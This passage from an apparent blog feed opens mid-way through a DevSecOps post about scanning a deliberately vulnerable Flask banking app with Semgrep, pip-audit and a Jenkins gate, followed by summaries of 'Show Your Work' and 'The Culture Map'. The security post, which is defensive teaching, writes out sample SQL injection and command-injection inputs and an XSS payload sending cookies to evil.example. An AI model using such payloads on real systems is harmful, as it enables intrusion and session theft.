<h3>SCA: WHERE THE REAL NOISE IS</h3>
<p>pip-audit found 17 vulnerabilities across four packages: flask, requests, idna, and urllib3. This is what happens when you pin old dependency versions and never update them.</p>
<p>The requests package alone at version 2.18.0 carries four separate CVEs with fix versions ranging from 2.20.0 to 2.32.4. urllib3 at 1.21.1 carries sixteen vulnerabilities.</p>
<p>This is typical of real codebases. The application code might be relatively clean. The 99% of the codebase you didn't write — the dependencies — is often carrying years of unpatched vulnerabilities.</p>
<p>The SCA stage failed, which triggered the security gate, which blocked the deploy. This is the correct behavior.</p>
<h3>THE SECURITY GATE</h3>
<p>The security gate is the stage that makes everything meaningful. Without it, findings are advisory. Developers can see them, acknowledge them, and deploy anyway.</p>
<p>With a security gate:</p>
<pre><code>Stage "Security gate" skipped due to earlier failure(s)
SECURITY GATE FAILED — deployment blocked. Fix all findings before merging.
Finished: FAILURE</code></pre>
<p>The gate makes security non-negotiable. It enforces the shift-left philosophy not through culture or process, but through automation. Vulnerable code simply cannot reach production.</p>
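<p>Mechanically, a gate like this is just pipeline ordering: the deploy stage is only reachable if every scan stage exits zero. A minimal Jenkinsfile sketch, with illustrative stage names and commands rather than the project's exact pipeline:</p>

```groovy
pipeline {
    agent any
    stages {
        stage('SAST') {
            // semgrep's --error flag returns a non-zero exit code on findings
            steps { sh 'semgrep scan --config auto --error' }
        }
        stage('SCA') {
            steps { sh 'pip-audit -r requirements.txt' }
        }
        stage('Deploy') {
            // never runs if any scan stage above failed
            steps { sh './deploy.sh' }
        }
    }
}
```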
<h3>WHAT THIS DEMONSTRATES</h3>
<p>After building and running this project end to end, a few things became very concrete:</p>
<p>Passing tests are not a security signal. All unit tests in the project pass. The app is functionally correct. The security failures are invisible to functional testing.</p>
<p>Speed matters. Semgrep scanned 17 files with 128 rules and returned results in seconds. A developer gets this feedback while they still have context about the code they just wrote.</p>
<p>Tools have limits. Semgrep missed the hardcoded secrets because they're generic strings. It missed the IDOR because it's a logic flaw. No tool catches everything. Understanding what a tool misses is as important as understanding what it catches.</p>
<p>Custom rules fill the gaps. The project includes custom Semgrep rules for IDOR detection and Flask-specific secret patterns. These are rules no public ruleset would ever have — because they're specific to this codebase's patterns. This is where the real depth of Semgrep becomes apparent.</p>
<p>SCA is often noisier than SAST. Four packages, seventeen vulnerabilities. Most of them are in transitive dependencies — packages you didn't choose, pulled in by packages you did choose. Managing this noise, distinguishing reachable from unreachable vulnerabilities, is where SCA tooling is still maturing.</p>
<h3>CONCEPTS EXPLAINED</h3>
<p>If some of the terminology in this post was unfamiliar, here is a plain-language breakdown of the key concepts behind what Semgrep does and why it works.</p>
<p><strong>SAST — Static Application Security Testing</strong></p>
<p>SAST analyses source code without executing the program. It reads your code as a structure and looks for patterns that indicate vulnerabilities — both known ones and potential ones.</p>
<p>The attacks SAST catches are a specific class: ones that do not require modifying source code at all. They come entirely through inputs the app itself asks for. A customer with malicious intent provides something unexpected, and the app handles it unsafely.</p>
<p>SQL Injection is the classic example. When an app asks for your name to look up your account, most users type their name. A malicious user types something like ' OR '1'='1' -- instead. The app takes that input and builds a SQL query from it. The attacker's input breaks out of the data context and becomes part of the query itself — extending it, modifying it, or bypassing it entirely. The impact ranges from reading data that should be private to corrupting the database to executing OS commands on the server. The fix is simple in principle: never treat input as an instruction. Use parameterized queries — placeholders such as ? or %s that the database driver binds as plain data — which make it structurally impossible for input to escape the data context and become part of the command.</p>
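<p>In Python's sqlite3 module the difference is a single placeholder. A minimal runnable sketch with an invented one-row table:</p>

```python
import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE users (name TEXT, balance REAL)")
conn.execute("INSERT INTO users VALUES ('alice', 100.0)")

payload = "' OR '1'='1' --"

# Vulnerable: the input is spliced into the query text, so the
# attacker's quote characters become part of the SQL itself.
leaked = conn.execute(
    "SELECT * FROM users WHERE name = '" + payload + "'"
).fetchall()
print(len(leaked))  # 1: the OR '1'='1' clause matched every row

# Parameterized: the ? placeholder keeps the input in the data
# context; the driver binds it as a plain string.
safe = conn.execute(
    "SELECT * FROM users WHERE name = ?", (payload,)
).fetchall()
print(len(safe))    # 0: no user is literally named that
```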
<p>Command Injection works the same way at the OS level. The app accepts input and passes it to a shell command. A malicious user appends a semicolon and a second command. The shell runs both. The attacker now has the ability to run arbitrary commands on the backend server — delete files, exfiltrate data, install backdoors. The fix is to never pass user input directly to a shell. Use subprocess with a list of arguments and shell=False. Each argument is treated as a whole string and never parsed by the shell.</p>
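<p>The same contrast in Python's subprocess module, as a runnable sketch:</p>

```python
import subprocess

user_input = "alice; echo pwned"

# Vulnerable: shell=True hands the whole string to /bin/sh,
# which treats the semicolon as a command separator.
out = subprocess.run(
    "echo " + user_input, shell=True,
    capture_output=True, text=True,
).stdout
print(out)  # "alice\npwned\n": the injected second command ran

# Safe: an argument list with shell=False (the default) passes
# the input as a single literal argument; no shell ever parses it.
out = subprocess.run(
    ["echo", user_input],
    capture_output=True, text=True,
).stdout
print(out)  # "alice; echo pwned\n": just data, nothing executed
```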
<p>XSS — Cross Site Scripting — operates at the browser level rather than the server. When you log into a website, your browser downloads and executes that site's JavaScript. The site also gives you a cookie — a small token that identifies you so you don't have to log in on every page. JavaScript running on a page has access to those cookies, your session data, local storage, and the entire page content. If an attacker can inject a malicious script into a page — through an input field that isn't sanitized — your browser pulls that script down along with the legitimate code and executes it. The attacker's script can forward your cookies to their own server, log every keystroke, replace the entire page with a fake login form, or make network requests using your identity. The fix is to always treat user input as text, never as HTML. Before rendering any user-provided content back into a page, escape all HTML characters. The second line of defence is a Content Security Policy header — even if a script somehow gets in, the CSP header tells the browser only to execute scripts from verified, authorised sources.</p>
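<p>The first line of defence is a one-liner in Python's standard library. A minimal sketch, using a hypothetical comment string:</p>

```python
import html

comment = '<script>fetch("https://evil.example/?c=" + document.cookie)</script>'

# Escaping turns markup characters into inert entities, so the
# browser renders the payload as text instead of executing it.
rendered = html.escape(comment)
print(rendered)
# &lt;script&gt;fetch(&quot;https://evil.example/?c=&quot; + document.cookie)&lt;/script&gt;
```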
<p><strong>How SAST Works Internally</strong></p>
<p>To do any of this, SAST tools need to actually understand code rather than just search text. The pipeline looks like this:</p>
<p>Source code is parsed into an AST — an Abstract Syntax Tree. This is the source code broken apart into a tree of operators, assignments, function calls, and conditions that the tool can reason about structurally. Unlike raw text search, the AST represents what the code means, not just what it says.</p>
<p>Control flow analysis maps all the paths the code can take — branches, loops, function calls. Code rarely runs straight from top to bottom. It splits based on conditions, repeats in loops, jumps to functions and returns. SAST builds a map of every possible execution path.</p>
<p>Taint tracking then follows untrusted data — input from a user — along every one of those paths. The data enters at a source (a form field, a URL parameter, a cookie). The tool traces every variable it touches, every function it passes through, every transformation applied to it. If it reaches a sink — a database query, a shell command, a rendered HTML page — without being sanitized first, that path is a vulnerability. The finding is reported with the exact file and line number where the taint reaches the sink.</p>
<p><strong>SCA — Software Composition Analysis</strong></p>
<p>Modern applications are mostly code other people wrote. Your dependencies — the packages in requirements.txt, package.json, pom.xml — can easily represent 99% of what's actually running. SCA is focused entirely on that layer.</p>
<p>SCA reads your manifest files, resolves the full dependency tree including transitive dependencies (packages your packages depend on), and checks every package and version against large databases of known vulnerabilities. Each known vulnerability has a CVE identifier, a severity score, affected versions, and a fixed version.</p>
<p>SCA tools also check license types across the dependency tree — a GPL-licensed package in a commercial product can create legal exposure that has nothing to do with security. And SCA tools generate SBOMs — Software Bills of Materials — a machine-readable inventory of every component in your software with its version, license, and source. When a critical CVE drops, an SBOM lets you query instantly whether your product is affected, rather than manually checking every codebase.</p>
<p><strong>Secrets Scanning</strong></p>
<p>Credentials, API keys, tokens, and private keys accidentally committed to source code are one of the most common causes of breaches. Secrets scanning detects these by pattern matching against known formats — AWS keys follow a specific pattern, GitHub tokens have a recognisable prefix, private keys have a standard header — and by entropy analysis, flagging strings that are long and random-looking enough to be a real credential.</p>
<p>The limitation, as this project discovered firsthand, is that generic strings like "admin123" or "supersecretkey123" don't match known patterns and have low entropy. They require custom rules written for your specific codebase.</p>
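<p>Entropy analysis is simple enough to sketch. Shannon entropy measures how evenly a string's characters are distributed, in bits per character; random credentials score high, while words and keyboard patterns score low. The example token below is invented for illustration:</p>

```python
import math
from collections import Counter

def shannon_entropy(s: str) -> float:
    """Bits of entropy per character, from the character frequency distribution."""
    counts = Counter(s)
    n = len(s)
    return -sum((c / n) * math.log2(c / n) for c in counts.values())

# A generic password: 8 distinct characters, log2(8) = 3.0 bits/char.
print(round(shannon_entropy("admin123"), 2))            # 3.0

# A random-looking token scores noticeably higher (about 4.22).
print(round(shannon_entropy("ghp_x7Qv9ZkL2mWt8rYp"), 2))
```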
<p><strong>Shift-Left</strong></p>
<p>The software delivery lifecycle runs roughly: Design, Code, Build, Test, Staging, Release, Production. Traditionally, security checkpoints lived near the right end of that line — pre-production reviews, penetration testing before release, security audits on finished software.</p>
<p>The shift-left philosophy moves security as far left as possible — ideally to the moment a developer writes the code. The reasoning is economic as much as technical: a vulnerability caught while the developer is still writing the code takes minutes to fix. The same vulnerability caught in a pre-production audit takes days. Caught in production after an incident, it can take weeks and cost significantly more in remediation, reputation, and regulatory exposure.</p>
<p>Semgrep is built for the left side of that line. It runs in seconds, integrates into CI/CD pipelines, and surfaces findings as inline comments on pull requests while the developer still has context. Checkmarx, by contrast, is built more toward the middle and right — deep comprehensive scans run nightly or weekly, reviewed by dedicated security teams, used for compliance reporting and formal sign-off.</p>
<p>Neither replaces the other. Semgrep catches the majority of issues fast and cheaply. Deeper tools catch the subtle cross-file flows and complex logic that fast scanners miss. A mature security program uses both.</p>
<p><strong>IDOR — Insecure Direct Object Reference</strong></p>
<p>Think of it this way: you are authorised to borrow a book from the library. But the librarian doesn't check which book — they just let you in. You can now take any book, or all of them.</p>
<p>In web applications, this means the app checks that you are logged in but never checks whether the specific resource you are requesting belongs to you. Your account is at /account/1. An attacker changes the URL to /account/2 and sees someone else's account. The app authenticated the user correctly. It never authorised which data that user is allowed to see. The fix is a single additional condition in the database query — fetch this account only if it belongs to the currently authenticated user.</p>
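<p>That single additional condition is visible in a query. In this sketch (schema invented for illustration), the only change between the vulnerable and the fixed lookup is the ownership check:</p>

```python
import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE accounts (id INTEGER, owner TEXT, balance REAL)")
conn.executemany("INSERT INTO accounts VALUES (?, ?, ?)",
                 [(1, "alice", 100.0), (2, "bob", 250.0)])

logged_in_user = "alice"
requested_id = 2  # alice tampers with the URL: /account/2

# IDOR: authenticated, but never authorized for this specific row.
row = conn.execute(
    "SELECT * FROM accounts WHERE id = ?", (requested_id,)
).fetchone()
print(row)  # (2, 'bob', 250.0): bob's account leaks

# Fixed: fetch the account only if it belongs to the current user.
row = conn.execute(
    "SELECT * FROM accounts WHERE id = ? AND owner = ?",
    (requested_id, logged_in_user),
).fetchone()
print(row)  # None
```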
<h3>RUNNING IT YOURSELF</h3>
<p>Everything is in the repository. You need Docker, Python 3, and a free Semgrep account.</p>
<pre><code>git clone https://github.com/PrakyathReddy/VulnBank-Semgrep
cd VulnBank-Semgrep
pip install -r requirements.txt
python app.py</code></pre>
<p>The app runs on localhost:5000. Demo credentials are in the README.</p>
<p>For the Jenkins pipeline, the README includes the exact Docker commands to get Jenkins running and connected to the repo.</p>
<p>Full project: <a href="https://github.com/PrakyathReddy/VulnBank-Semgrep">https://github.com/PrakyathReddy/VulnBank-Semgrep</a></p>
<h3>CLOSING THOUGHT</h3>
<p>Security tooling only works if developers trust it and act on it. A tool that takes two hours to scan and produces eight hundred findings will be ignored. A tool that takes thirty seconds, produces four precise findings with line numbers and fix suggestions, and blocks the build — that gets fixed.</p>
<p>The shift-left movement is not really about tools. It is about putting security feedback at the moment when a developer can most easily act on it: while they are still thinking about that code, before the PR is merged, before the deploy happens.</p>
<p>VulnBank makes that concrete. The code is bad, the tests pass, the pipeline catches it, the deploy is blocked. That sequence — visible, automated, fast — is what good security tooling looks like in practice.</p>
]]></content:encoded></item><item><title><![CDATA[Stop Hiding Your Work: What I Learned from Austin Kleon's Show Your Work]]></title><description><![CDATA[Most of us wait. We wait until the project is done, until the portfolio is polished, until we feel "ready." And then we wonder why nobody knows what we do.
Austin Kleon's Show Your Work changed the wa]]></description><link>https://blog.prakyath.dev/stop-hiding-your-work-what-i-learned-from-austin-kleon-s-show-your-work</link><guid isPermaLink="true">https://blog.prakyath.dev/stop-hiding-your-work-what-i-learned-from-austin-kleon-s-show-your-work</guid><dc:creator><![CDATA[Prakyath Reddy]]></dc:creator><pubDate>Thu, 05 Mar 2026 17:20:57 GMT</pubDate><content:encoded><![CDATA[<p>Most of us wait. We wait until the project is done, until the portfolio is polished, until we feel "ready." And then we wonder why nobody knows what we do.</p>
<p>Austin Kleon's <em>Show Your Work</em> changed the way I think about creative visibility. It's not a book about self-promotion — it's a book about generosity, connection, and the quiet discipline of sharing what you're learning. Here are the ideas that stuck with me the most.</p>
<h2>You Don't Have to Be an Expert</h2>
<p>There's a beautiful concept in the book called <strong>scenius</strong> — the idea that creativity doesn't happen in isolation. It happens in communities of people who are learning from each other, borrowing ideas, remixing, and building something none of them could have built alone. Nobody in the group needs to be a genius. The magic is in the exchange.</p>
<p>This is liberating. It means you don't have to wait until you've "arrived" to start contributing. Make a commitment to learn in public. Share your journey, not just your destination.</p>
<h2>Share the Process, Not Just the Product</h2>
<p>We're trained to present finished work. But people connect with process. When you share your sources of inspiration, the messy middle, the challenges you're working through — you become relatable. You become human. And that's far more compelling than a polished case study.</p>
<p>Think of it in three stages. Early on, talk about what's inspiring you and what you're exploring. In the middle, share your methods and progress. At the end, reflect on outcomes and lessons learned. This kind of ongoing narrative is worth more than any résumé, because it shows people what you're working on <em>right now</em>.</p>
<h2>The Daily Practice</h2>
<p>Here's the simple discipline: once a day, before bed, look through what you've documented and share something from it. It doesn't have to be groundbreaking. It just has to be consistent.</p>
<p>But before you hit publish, ask yourself two questions: <em>So what?</em> and <em>Is this useful to my reader?</em> If the answer to either is "not really," hold it back. Generosity isn't the same as oversharing.</p>
<h2>Think in Flow and Stock</h2>
<p>Not everything you share carries the same weight, and that's fine. <strong>Flow</strong> is the daily stream — updates, observations, small insights. It keeps you visible and in rhythm. <strong>Stock</strong> is the stuff that lasts — the post someone bookmarks, the essay that's still relevant two months later. The beautiful thing is that stock often evolves from flow. Today's quick observation can become next month's best piece.</p>
<h2>Own Your Space</h2>
<p>Platforms come and go. Remember Myspace? Buy a domain with your name on it and build there. LinkedIn, Instagram, and whatever comes next are rented land. Your own site is home.</p>
<h2>Teach Everything You Know</h2>
<p>This one is counterintuitive. Won't sharing your secrets help your competition? In practice, no. When you teach openly, people feel like they were part of your journey. They root for you. They trust you. Hoarding knowledge creates distance; sharing it builds community.</p>
<h2>Tell Better Stories</h2>
<p>Here's something worth sitting with: how people <em>feel</em> about your work depends entirely on the story you tell them about it. And how they feel about it determines its value. A story is a lens — it frames perception. Learn to tell good ones, and your work will speak louder.</p>
<h2>Be a Member Before You're a Leader</h2>
<p>Want people to listen to you? Start by listening to them. The best way to lead a community is to first be a genuinely great member of one. Be curious. Be generous. Be present.</p>
<p>And if you want followers, the recipe is deceptively simple: be someone worth following. Be interested in things, and you'll become interesting.</p>
<h2>Find Your Tribe</h2>
<p>The whole act of putting your work out there is really about discovery — finding the people who think the way you do, care about the things you care about, and are building in the same direction. Be thoughtful about <em>where</em> you look. The right room matters more than the biggest room.</p>
<h2>Play the Long Game</h2>
<p>As your work gets more visible, criticism will come. That's the deal. Toughen up, learn to roll with it, and resist the urge to overthink every negative comment.</p>
<p>Keep showing up. Collect emails. Help others freely. Share valuable things without expecting a return. You'll get what you want if you stick around long enough — just don't quit too early.</p>
<p>And when you finally feel like you've mastered something? When the learning slows down and the spark fades? That's not the end. That's your cue to move on, become a beginner again, and start the whole beautiful cycle over.</p>
<hr />
<p><em>Inspired by Show Your Work! by Austin Kleon. If these ideas resonate, I'd highly recommend picking up the book — it's a short, energizing read that might just change how you think about sharing your craft.</em></p>
]]></content:encoded></item><item><title><![CDATA[What "The Culture Map" Taught Me About Working Across Borders]]></title><description><![CDATA[I recently read Erin Meyer's The Culture Map, and it fundamentally changed how I think about cross-cultural collaboration. If you work with international teams — or plan to — this book is essential re]]></description><link>https://blog.prakyath.dev/what-the-culture-map-taught-me-about-working-across-borders</link><guid isPermaLink="true">https://blog.prakyath.dev/what-the-culture-map-taught-me-about-working-across-borders</guid><category><![CDATA[culturemap]]></category><category><![CDATA[book summary]]></category><category><![CDATA[notes]]></category><category><![CDATA[Culture]]></category><category><![CDATA[internationalteams]]></category><category><![CDATA[cross cultural teams]]></category><category><![CDATA[Devops]]></category><dc:creator><![CDATA[Prakyath Reddy]]></dc:creator><pubDate>Thu, 05 Mar 2026 08:28:34 GMT</pubDate><content:encoded><![CDATA[<p>I recently read Erin Meyer's <em>The Culture Map</em>, and it fundamentally changed how I think about cross-cultural collaboration. If you work with international teams — or plan to — this book is essential reading. Here's what stuck with me.</p>
<h2>The Core Problem</h2>
<p>Most of us try to resolve cross-cultural friction by focusing on individuals. "Oh, that's just how Raj is," or "Sarah's always blunt like that." But culture operates at a level deeper than personality. It shapes how we perceive, think, and act — often without us realizing it. When we mistake cultural patterns for personal quirks, misunderstandings pile up fast.</p>
<p>Meyer's insight is simple but powerful: before you can work effectively across cultures, you need a framework to decode those differences. That framework is her <strong>eight-scale model</strong>.</p>
<h2>The Eight Scales</h2>
<p>Meyer maps cultural differences along eight dimensions, each a spectrum between two extremes:</p>
<ol>
<li><p><strong>Communicating</strong> — Low-context (explicit, literal) vs. High-context (implicit, layered with subtext)</p>
</li>
<li><p><strong>Evaluating</strong> — Direct negative feedback vs. Indirect negative feedback</p>
</li>
<li><p><strong>Persuading</strong> — Principles-first (build the theory, then conclude) vs. Applications-first (lead with the result)</p>
</li>
<li><p><strong>Leading</strong> — Egalitarian vs. Hierarchical</p>
</li>
<li><p><strong>Deciding</strong> — Consensual vs. Top-down</p>
</li>
<li><p><strong>Trusting</strong> — Task-based (earned through competence) vs. Relationship-based (earned through personal bonds)</p>
</li>
<li><p><strong>Disagreeing</strong> — Confrontational vs. Avoids confrontation</p>
</li>
<li><p><strong>Scheduling</strong> — Linear-time (strict adherence to schedules) vs. Flexible-time</p>
</li>
</ol>
<p>Here's an example of a culture map comparing Israel and Russia across all eight scales. Notice how two countries can diverge sharply on some dimensions while sitting close together on others:</p>
<img src="https://cdn.hashnode.com/uploads/covers/6338e8dbfa20fa4bc8e57dfc/5d193180-e7aa-4f83-8eaa-c6da277df503.png" alt="" style="display:block;margin:0 auto" />

<p>Every culture lands somewhere on each of these scales. The key is that <strong>it's always relative</strong>. Indians might seem disorganized compared to the French, but to a German, the French seem just as chaotic. There are no absolutes — only positions relative to your own starting point.</p>
<p>Within any country, there's still a bell curve of individual variation. Culture gives you the center of that distribution, not a rigid rule:</p>
<img src="https://cdn.hashnode.com/uploads/covers/6338e8dbfa20fa4bc8e57dfc/20341e89-085e-4c83-8ed3-88240f0413ba.png" alt="" style="display:block;margin:0 auto" />

<p>Culture and personality go hand in hand. There's a range of behaviors considered "normal" within any culture, and these ranges can overlap across countries. The Dutch and British ranges on the feedback scale, for example, overlap in the middle — meaning some Brits are more direct than some Dutch:</p>
<img src="https://cdn.hashnode.com/uploads/covers/6338e8dbfa20fa4bc8e57dfc/0b6d1f15-a7c5-4ace-80c0-48d554d59108.png" alt="" style="display:block;margin:0 auto" />

<hr />
<h2>Communicating: Say What You Mean (or Don't)</h2>
<p>This scale hit home the hardest for me. Countries like India, China, Japan, and Indonesia are <strong>high-context</strong> cultures. We expect people to read between the lines, pick up on what's implied, and share a web of unspoken reference points.</p>
<p>The US and most Anglo-Saxon countries sit at the <strong>low-context</strong> end. Communication is explicit, literal, and direct. The burden of clarity falls on the speaker, not the listener. Americans try to eliminate any room for misinterpretation.</p>
<img src="https://cdn.hashnode.com/uploads/covers/6338e8dbfa20fa4bc8e57dfc/fdf605e8-3321-460b-bd21-3520193fcfef.png" alt="" style="display:block;margin:0 auto" />

<p>Here's how this plays out in practice: in high-context Iran, if someone offers you food, you refuse twice before accepting — even if you're starving. In the US, you just say yes.</p>
<p>Or consider what happens when an American finishes a presentation and asks, "Any questions?" An Indian audience will often say, "No, it's clear" — even when it isn't. To an American, that confirmation is taken at face value. Confusion follows.</p>
<p><strong>What each side thinks of the other:</strong></p>
<ul>
<li><p>A low-context person perceives a high-context person as secretive, evasive, or just bad at communicating clearly.</p>
</li>
<li><p>A high-context person thinks a low-context person is patronizing — stating what should already be understood.</p>
</li>
</ul>
<p>The practical takeaway for anyone from a high-context culture working with Westerners: <strong>be transparent, be specific, be explicit.</strong> Don't assume anything is implied. Recap key points. Put things in writing. And if you don't understand something, say so directly rather than hinting at it politely.</p>
<p>Multi-cultural teams need low-context processes. The more low-context a culture, the more it gravitates toward written objectives, org charts, performance appraisals, and documented expectations — everything spelled out on paper.</p>
<hr />
<h2>Evaluating: The Feedback Minefield</h2>
<p>Americans wrap negative feedback in layers of positivity — the classic "three positives for every negative" approach. The French criticize passionately and rarely bother with praise. The Dutch are blunt and straightforward. The Japanese would never criticize someone openly, especially not in a group.</p>
<p>We need to learn to interpret feedback properly. The British are a special case — they chronically understate everything. This table is one of the most memorable parts of the book:</p>
<img src="https://cdn.hashnode.com/uploads/covers/6338e8dbfa20fa4bc8e57dfc/70da8a96-a822-4bf8-9a5a-dffae0064401.png" alt="" style="display:block;margin:0 auto" />

<p>When a British manager says "quite good," they might mean "barely acceptable." Learning to decode these patterns can save you from serious misreads.</p>
<img src="https://cdn.hashnode.com/uploads/covers/6338e8dbfa20fa4bc8e57dfc/93b4d1ed-da2f-487a-8b29-49c00d82c2cb.png" alt="" style="display:block;margin:0 auto" />

<p>What makes this tricky is that it <strong>doesn't always align with the communicating scale</strong>. Americans are low-context communicators (explicit and clear) but <em>indirect</em> when delivering criticism. The French are higher-context in general communication, but devastatingly <em>direct</em> with negative feedback.</p>
<p>This two-by-two quadrant captures the full picture:</p>
<img src="https://cdn.hashnode.com/uploads/covers/6338e8dbfa20fa4bc8e57dfc/59aaf4bb-5c53-40fd-9d0f-830f38bbef52.png" alt="" style="display:block;margin:0 auto" />

<p>Countries in Quadrant D (high-context, indirect feedback) like Japan, China, and India require the most care — never give negative feedback in front of a group, always do it in private.</p>
<p>One important caution: <strong>don't try to overcorrect</strong>. If you're from an indirect culture, suddenly being blunt with a Dutch colleague can backfire. Adaptation should be gradual.</p>
<hr />
<h2>Persuading: Why vs. What</h2>
<p>This one surprised me. When an American presents an idea, they lead with the recommendation and the expected impact. Get to the point. <em>What</em> should we do, and <em>what happens</em> if we do it?</p>
<p>A German audience wants the opposite. Show me the methodology. Walk me through the reasoning. Explain the parameters. The conclusion should come <em>last</em>, as the logical endpoint of a rigorous process.</p>
<img src="https://cdn.hashnode.com/uploads/covers/6338e8dbfa20fa4bc8e57dfc/4055d01a-e445-4368-9f5a-a5f81256a314.png" alt="" style="display:block;margin:0 auto" />

<p>Meyer frames this as <strong>principles-first</strong> (deductive) versus <strong>applications-first</strong> (inductive) reasoning:</p>
<ul>
<li><p><strong>Principles-first</strong>: A causes B, B causes C, therefore A causes C. Spend 80% of your time on the theory, 20% applying it. Understanding <em>why</em> matters deeply. Build your argument logically before concluding.</p>
</li>
<li><p><strong>Applications-first</strong>: Lead with the result. Spend 80% on practical application, 20% on underlying theory. <em>How</em> matters more than <em>why</em>. Shorter is sweeter.</p>
</li>
</ul>
<p>Asian cultures add another layer entirely: <strong>holistic thinking</strong>. Where Westerners tend to zoom in on the most important element (micro to macro), Asians often zoom out — looking at relationships, interconnections, and how a task fits within the broader picture (macro to micro).</p>
<hr />
<h2>Leading: Egalitarian vs. Hierarchical</h2>
<img src="https://cdn.hashnode.com/uploads/covers/6338e8dbfa20fa4bc8e57dfc/5dec318b-100a-499c-b91f-2831b4d6df63.png" alt="" style="display:block;margin:0 auto" />

<p>In <strong>egalitarian</strong> cultures (Denmark, Netherlands, Sweden), the boss is a facilitator among equals. Organizational structures are flat, and communication routinely skips hierarchical lines.</p>
<p>In <strong>hierarchical</strong> cultures (Japan, Korea, India, China), status matters. The best boss is a strong director who leads from the front. Organizational structures are multilayered and fixed, and communication follows set hierarchical lines.</p>
<p>In hierarchical cultures, leaders act like guardians who take care of their employees, and in return, employees are loyal and obedient. The burden of responsibility exists in both directions.</p>
<hr />
<h2>Deciding: Consensual vs. Top-Down</h2>
<p>Here's where the model gets counterintuitive. You might assume egalitarian cultures make decisions by consensus and hierarchical cultures use top-down decision-making. <strong>Not necessarily.</strong></p>
<p>American workplaces are relatively egalitarian — first names, open-door policies, casual dress. But decisions are often made quickly by individuals in charge, and those decisions are understood to be flexible and revisable. Speed matters more than buy-in. Meyer calls this "small-d" decision-making:</p>
<img src="https://cdn.hashnode.com/uploads/covers/6338e8dbfa20fa4bc8e57dfc/0b20e9f8-16b9-45f9-96a5-2c62a4483d4d.png" alt="" style="display:block;margin:0 auto" />

<p>Germany is more hierarchical in its leadership style, but intensely <strong>consensus-driven</strong> when making decisions. Teams spend significant time discussing, debating, and aligning. But once a decision is made, it's <strong>final</strong>. No revisiting, no course corrections mid-stream. This is "big-D" Decision-making:</p>
<img src="https://cdn.hashnode.com/uploads/covers/6338e8dbfa20fa4bc8e57dfc/17b1a056-b700-491d-b3fc-ec95c58d0d38.png" alt="" style="display:block;margin:0 auto" />

<img src="https://cdn.hashnode.com/uploads/covers/6338e8dbfa20fa4bc8e57dfc/fb22d110-6d51-4799-94e9-1b853355429f.png" alt="" style="display:block;margin:0 auto" />

<p>Japan takes this to an extreme: the most hierarchical leadership style in Meyer's model, combined with the deepest commitment to consensus. Through the <strong>ringi system</strong>, consensus builds from the bottom up — engineers agree, then low-level managers, then senior managers — until by the time a decision reaches the C-suite, it's essentially already been made. This is why it's nearly impossible to sway a Japanese decision once it reaches the top.</p>
<hr />
<h2>Trusting: Peaches and Coconuts</h2>
<p>Meyer draws a memorable distinction between two types of trust: <strong>cognitive</strong> (based on competence and reliability — from the head) and <strong>affective</strong> (based on personal connection and warmth — from the heart).</p>
<img src="https://cdn.hashnode.com/uploads/covers/6338e8dbfa20fa4bc8e57dfc/9f528b69-1bff-4c06-a441-e9337aa027d6.png" alt="" style="display:block;margin:0 auto" />

<p>Americans keep these sharply separated. They're friendly from the first handshake — warm, open, generous with smiles. But that friendliness isn't friendship. Meyer calls this a <strong>peach</strong> culture: soft and inviting on the outside, but hit a hard pit before long. They tend to put their best self forward and be careful not to reveal vulnerabilities — which can come across as performative or fake.</p>
<p>Many European cultures are the opposite — <strong>coconut</strong> cultures. The exterior is formal, even cold. But once you crack through, the relationships run deep and genuine.</p>
<p>The practical lesson: in relationship-based cultures, you socialize <em>before</em> getting down to business. When you move from the office to the pub, <strong>drop your professional guard</strong>. Be real, be vulnerable. Being guarded outside of work reads as inauthentic — and inauthenticity kills trust.</p>
<p>In many relationship-based cultures, the relationship <em>is</em> the contract.</p>
<hr />
<h2>Disagreeing: Debate vs. Face</h2>
<p>The French love a good argument. They'll debate passionately, even aggressively, and then go to lunch together as if nothing happened. Disagreement is intellectual, not personal.</p>
<p>In much of Asia, the calculus is different. Protecting someone's <strong>face</strong> — their dignity and public standing — often matters more than being right. Open confrontation risks embarrassment, and embarrassment damages relationships. In non-confrontational cultures, attacking an opinion is seen as attacking the person.</p>
<img src="https://cdn.hashnode.com/uploads/covers/6338e8dbfa20fa4bc8e57dfc/5c9e3340-5aa9-4e61-a2d2-e51691fc666e.png" alt="" style="display:block;margin:0 auto" />

<p>An important nuance: <strong>confrontational doesn't necessarily mean emotionally expressive</strong>. Germans and Dutch are highly confrontational but emotionally restrained. Israelis and French are both confrontational <em>and</em> emotionally expressive. Meanwhile, countries like India and Saudi Arabia avoid confrontation but are still quite emotionally expressive:</p>
<img src="https://cdn.hashnode.com/uploads/covers/6338e8dbfa20fa4bc8e57dfc/09990d9e-9af3-4d6d-9e99-07c002cf8195.png" alt="" style="display:block;margin:0 auto" />

<p>This creates very different meeting cultures:</p>
<ul>
<li><p><strong>American</strong>: Debate during the meeting itself and come to a decision.</p>
</li>
<li><p><strong>French</strong>: Discuss and debate various viewpoints — the meeting is for exploring ideas.</p>
</li>
<li><p><strong>Japanese/Chinese</strong>: The real discussion happens <em>before</em> the meeting, in side conversations and informal check-ins. The meeting itself is largely ceremonial — a space to formalize what's already been agreed upon.</p>
</li>
</ul>
<p>Useful language tips: in confrontational cultures, use <strong>upgraders</strong> (totally, absolutely, completely). In non-confrontational cultures, use <strong>downgraders</strong> (sort of, kind of, partly, perhaps).</p>
<hr />
<h2>Scheduling: Linear-Time vs. Flexible-Time</h2>
<img src="https://cdn.hashnode.com/uploads/covers/6338e8dbfa20fa4bc8e57dfc/29979bb6-6a98-43d7-b939-1e37903a2746.png" alt="" style="display:block;margin:0 auto" />

<p>In <strong>linear-time</strong> cultures (Germany, Japan, Switzerland), project steps are approached sequentially — one task at a time, no interruptions, strict adherence to deadlines. Punctuality and organization are paramount.</p>
<p>In <strong>flexible-time</strong> cultures (India, Nigeria, Saudi Arabia), things are more fluid. Multiple tasks are handled simultaneously, interruptions are accepted, and adaptability is valued over rigid planning.</p>
<hr />
<h2>Putting It All Together</h2>
<p>Here's a culture map comparing four countries across all eight scales. Notice how each country has a unique signature — and how two countries might be close on one dimension but far apart on another:</p>
<img src="https://cdn.hashnode.com/uploads/covers/6338e8dbfa20fa4bc8e57dfc/e83f0cfb-ec8a-4d0a-8bf9-2d0ce07e56e8.png" alt="" style="display:block;margin:0 auto" />

<h2>What I'm Taking Away</h2>
